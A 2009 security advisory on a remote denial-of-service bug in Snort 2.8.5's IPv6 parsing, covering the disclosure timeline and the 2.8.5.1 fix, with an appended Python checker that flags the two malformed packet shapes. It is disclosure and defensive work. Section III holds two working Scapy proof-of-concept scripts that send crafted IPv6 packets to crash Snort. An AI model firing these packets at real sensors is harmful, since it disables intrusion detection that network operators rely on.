Snort <= 2.8.5 IPV6 Remote Denial of Service Vulnerability

2009-10-22 / 2009-10-23
Credit: Laurent Gaffié
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

=============================================
- Date: October 22nd, 2009
- Discovered by: Laurent Gaffié
- Severity: Low
=============================================

I. VULNERABILITY
-------------------------
Snort <= 2.8.5 IPV6 Remote DoS

II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specially crafted IPv6 packets.
To trigger these bugs, Snort must have been compiled with the --enable-ipv6 option and be running in verbose mode (-v).

III. PROOF OF CONCEPT
-------------------------
You can reproduce these two different bugs easily by using the Python low-level networking library Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip).

1) # only works on x86
#!/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) # works on x86, x64
#!/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)

IV. SYSTEMS AFFECTED
-------------------------
These proofs of concept have been tested on Snort:
- 2.8.5

V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor

VI. SOLUTION
-------------------------
A new version correcting these issues has been released (2.8.5.1):
http://www.snort.org/downloads

VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory sent to the Snort team.
October 14th, 2009: Snort security team confirmed the bug.
October 16th, 2009: Second issue discovered, advisory sent to the Snort team.
October 20th, 2009: Snort security team confirmed the bug.
October 22nd, 2009: Snort team released a new version.

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

References:

http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.html
http://g-laurent.blogspot.com/2009/10/snort-285-ipv6-remote-denial-of-service.html
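For sensors that cannot be upgraded to 2.8.5.1 immediately, the two packet shapes named in the proof-of-concept comments (next header 6 with a payload too short to hold a TCP header, and next header 1, the IPv4 ICMP number, inside IPv6) can be flagged upstream. The following is an added example, not code from the advisory or from Snort; the function names, labels and sample packets are constructed here, and the checks are heuristics on packet shape, not the fix shipped in 2.8.5.1.

```python
import struct

IPV6_HDR_LEN = 40
PROTO_ICMPV4 = 1     # IPv4 ICMP; ICMPv6 uses next header 58
PROTO_TCP = 6
TCP_MIN_HDR = 20     # smallest legal TCP header, in bytes

def check_ipv6(packet: bytes) -> list[str]:
    """Return anomaly labels for a raw IPv6 packet (no link-layer header)."""
    if len(packet) < IPV6_HDR_LEN:
        return ["truncated-ipv6-header"]
    vtf, payload_len, next_hdr, _hop = struct.unpack("!IHBB", packet[:8])
    if vtf >> 28 != 6:
        return ["not-ipv6"]
    findings = []
    payload = packet[IPV6_HDR_LEN:]
    if payload_len != len(payload):
        findings.append("payload-length-mismatch")
    if next_hdr == PROTO_ICMPV4:
        findings.append("icmpv4-over-ipv6")
    if next_hdr == PROTO_TCP:
        if len(payload) < TCP_MIN_HDR:
            findings.append("tcp-header-truncated")
        else:
            # Upper nibble of byte 12 is the TCP data offset in 32-bit words.
            data_offset = (payload[12] >> 4) * 4
            if data_offset < TCP_MIN_HDR or data_offset > len(payload):
                findings.append("tcp-bad-data-offset")
    return findings

def build_ipv6(next_hdr: int, payload: bytes) -> bytes:
    """Constructed sample packet using documentation addresses (2001:db8::/32)."""
    src = bytes.fromhex("20010db8") + bytes(11) + b"\x01"
    dst = bytes.fromhex("20010db8") + bytes(11) + b"\x02"
    header = struct.pack("!IHBB", 6 << 28, len(payload), next_hdr, 64)
    return header + src + dst + payload

# Constructed samples: zero-filled payloads, sized to exercise each check.
SAMPLES = {
    "short-tcp": build_ipv6(PROTO_TCP, bytes(7)),
    "icmpv4": build_ipv6(PROTO_ICMPV4, bytes(34)),
    "normal-tcp": build_ipv6(PROTO_TCP, bytes(12) + b"\x50" + bytes(7)),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, check_ipv6(pkt) or "ok")
```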

